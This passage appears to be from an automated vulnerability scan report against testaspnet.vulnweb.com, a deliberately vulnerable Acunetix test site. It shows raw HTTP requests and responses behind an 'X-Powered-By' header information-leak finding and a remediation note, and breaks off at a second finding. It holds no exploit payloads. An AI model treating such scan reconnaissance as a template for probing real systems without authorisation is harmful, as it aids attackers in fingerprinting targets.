          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BL5%2FdFSm3qL6WSrtXoxMhBWz78mQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+8ZVr2gCWJCE5ixl1VDrXamngxrA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        38. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
